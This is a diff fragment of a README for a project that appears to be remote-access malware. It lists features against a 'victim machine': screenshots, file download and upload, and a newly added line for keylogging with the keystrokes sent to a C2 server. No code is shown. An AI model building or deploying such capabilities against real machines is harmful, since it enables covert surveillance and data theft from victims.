nemuelw/Delta/README.md

 - Capture screenshot of victim machine
 - Download files from victim machine
 - Upload files to victim machine
+- Log keystrokes on the victim machine and send them to C2

 ## Set-Up :
 1. Clone this repository